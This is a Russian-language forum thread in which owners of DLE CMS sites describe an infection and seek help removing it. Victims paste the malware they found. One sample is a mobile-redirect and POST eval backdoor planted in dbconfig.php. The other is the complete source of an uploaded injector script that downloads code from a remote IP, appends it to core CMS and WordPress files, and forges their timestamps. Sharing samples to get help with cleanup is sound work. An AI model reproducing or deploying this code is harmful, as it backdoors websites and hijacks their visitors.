Вирус на сайте cms dle

🤣

И меня зацепило😡

Прописался в dbconfig.php

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://livecountall.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

И в .htaccess

Редиректы

актуально, никак не лечится :( яндекс ругается.

ищу спеца за плату.

вчера было все нормально, сегодня зашол на сайт и тот отображается только в мобильной версии 😮(((

что это может быть?

подскажите кто сталкивался с подобным дивом..

Зарание благодарен всем откликнувшимся..🍾

P.S

может это новая разновидность вирусняков?

Еслиб бы увидить сам сайт, думаю было бы проще понять )

Экстрасенсы все в отпуске.

Belomor, отрпаивл в личку url

проблема решена!

та же фигня редирект на livecountall.ws, почистила файлы от заразы😡, помогите закрыть дыры, оплачу ваши старания (пишите в личку или стучите в асю 649364211)

Уважаемые пользователи источник проникновения может быть не только в самом движке, очень часто источник сидит уже давно на сайтах, внимательно смотрите файлы.

Помогу исправить уязвимость в ДЛЕ.

Жестоко, но это факт.

Несколько раз залили в папку uploads файл addnews.php:

<?chdir("../"); // смена cwd

$file_arr = array('language/Russian/website.lng','engine/classes/mysql.php','engine/classes/templates.class.php','engine/modules/calendar.php','engine/modules/functions.php','engine/modules/sitelogin.php','engine/modules/topnews.php','includes/framework.php','wp-includes/functions.php', 'engine/data/referer.conf.php', 'engine/data/dbconfig.php', 'engine/data/config.php', 'wp-config.php','index.php');

$icode = file_get_contents("http://178.211.33.75/ua/fm.txt"); // получаем код

$searchstr = "getnewsfromid";//строка поиска



// проверка наличия файлов в директориях

function checkexists($in) {

	for ($i = 0; $i <= count($in); $i++) {

	if (file_exists($in[$i])) {

	return true;

	break;

	}

	}

}



// чек на наличие кода в одном из файлов списка

function checkcode($in,$sstr) {

	for ($i = 0; $i <= count($in); $i++) {

	$infile = @file_get_contents($in[$i]);

	if (stristr($infile,$sstr)) {

	return true;

	break;

	}

}

}

//инжект

function Inject($path_for_file,$inject_code){

        $src = @file_get_contents($path_for_file);

	//	echo $src;

        $pos_of_end = strrpos($src,"?>");

		if($pos_of_end===false)

		$pos_of_end = strlen($src);

        $src = substr_replace($src,$inject_code,$pos_of_end,0);

		/*$src = str_replace("?>", $inject_code." ?>", $src);*/

        if(@file_put_contents($path_for_file,$src))

        return true;

		else

	    return false;

		

		

       // flush();

    }

	function tfile($fname) {

	

	$file_time = 'engine/rss.php';

$time_create = filemtime($file_time); 

if($res=touch ( $fname , $time_create )){

echo "touch OK \n";

} else {

echo "touch Problem \n";

}

}

//процесс	

function process ($fa,$code,$sss){

	if (checkexists($fa)) {

	if (!checkcode($fa,$sss)) {

	for($i<0; $i <= count($fa); $i++) {

	//echo $fa[$i];

	if (Inject($fa[$i], $code)) {

	echo "Succefull inject to {$fa[$i]}";

	tfile($fa[$i]);

	break;

	}

	



}

} else {

echo "site already framed";

}

} else {

echo "is non dle. files non exists";

}

}



process($file_arr,$icode,$searchstr); ?>

Кто сталкивался? Помогите решить проблему.